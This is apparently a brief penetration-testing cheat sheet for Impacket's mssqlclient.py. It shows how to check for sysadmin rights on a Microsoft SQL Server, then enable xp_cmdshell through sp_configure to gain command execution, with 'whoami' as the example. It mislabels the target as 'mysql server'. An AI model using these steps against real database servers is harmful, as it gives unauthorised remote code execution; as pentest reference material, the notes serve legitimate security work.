# Impacket's mssqlclient.py

We can use this tool to interact with mysql server using login credentials and then execute sql quieries.

***

### Check if Current SQL user has sysadmin Privileges

```
SELECT IS_SRVROLEMEMBER('sysadmin')
```

***

### Gain RCE

```
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"
```

***